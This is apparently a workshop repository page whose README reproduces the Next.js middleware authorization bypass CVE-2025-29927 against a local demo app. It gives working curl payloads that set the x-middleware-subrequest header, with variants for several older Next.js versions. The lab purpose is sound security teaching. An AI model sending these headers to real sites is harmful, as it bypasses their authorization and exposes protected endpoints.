Skip to content

MinDAICA/workshop

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
.gitignore
.gitignore
 
 
README.md
README.md
 
 
jsconfig.json
jsconfig.json
 
 
middleware.js
middleware.js
 
 
next.config.mjs
next.config.mjs
 
 
package-lock.json
package-lock.json
 
 
package.json
package.json
 
 

Repository files navigation

CVE-2025-29927 Authorization Bypass reproduction

This repository is a reproduction of the CVE-2025-29927 vulnerability in the next package

How to reproduce

  1. Follow the steps below to clone, and run the Next.js application
  2. Test authorization denies access to the /api/hello endpoint
$ curl http://localhost:3000/api/hello

{"error":"Unauthorized"}%
  1. Test authorization works when token is provided
$ curl -H "Authorization: my-jwt-token-here" http://localhost:3000/api/hello

{"message":"Hello World"}%
  1. Now it can also be bypassed if we nest middleware 5x times into the special x-middleware-subrequest header:
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/api/hello

{"message":"Hello, World"}

CVE-2025-29927 exploitation for older Next.js versions

Next.js 12 and 13 versions used to have a different naming convention for the middleware file (_middleware.js), which was changed to middleware.js in Next.js 14. This vulnerability can be exploited in older versions by using the _middleware.js file.

For example, the following payloads would apply, depending on the Next.js version and your routing convention:

  • curl -H "x-middleware-subrequest: middleware" http://localhost:3000/api/hello (for Next.js versions 12.2 with the middleware.js file in the root of the app, not inside the pages directory)
    • curl -H "x-middleware-subrequest: src/middleware" http://localhost:3000/api/hello
  • curl -H "x-middleware-subrequest: _middleware" http://localhost:3000/api/hello (for Next.js versions 11 and up to 12.2)
  • curl -H "x-middleware-subrequest: pages/_middleware" http://localhost:3000/api/hello
  • curl -H "x-middleware-subrequest: pages/admin/_middleware" http://localhost:3000/api/hello

Getting Started

First, run the development server:

npm run dev
# or
yarn dev
# or
pnpm dev
# or
bun dev

Open http://localhost:3000 with your browser to see the result.

You can start editing the page by modifying app/page.js. The page auto-updates as you edit the file.

This project uses next/font to automatically optimize and load Geist, a new font family for Vercel.

Learn More

To learn more about Next.js, take a look at the following resources:

You can check out the Next.js GitHub repository - your feedback and contributions are welcome!

Deploy on Vercel

The easiest way to deploy your Next.js app is to use the Vercel Platform from the creators of Next.js.

Check out our Next.js deployment documentation for more details.

About

FPTJetking-demo

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages

  • JavaScript 100.0%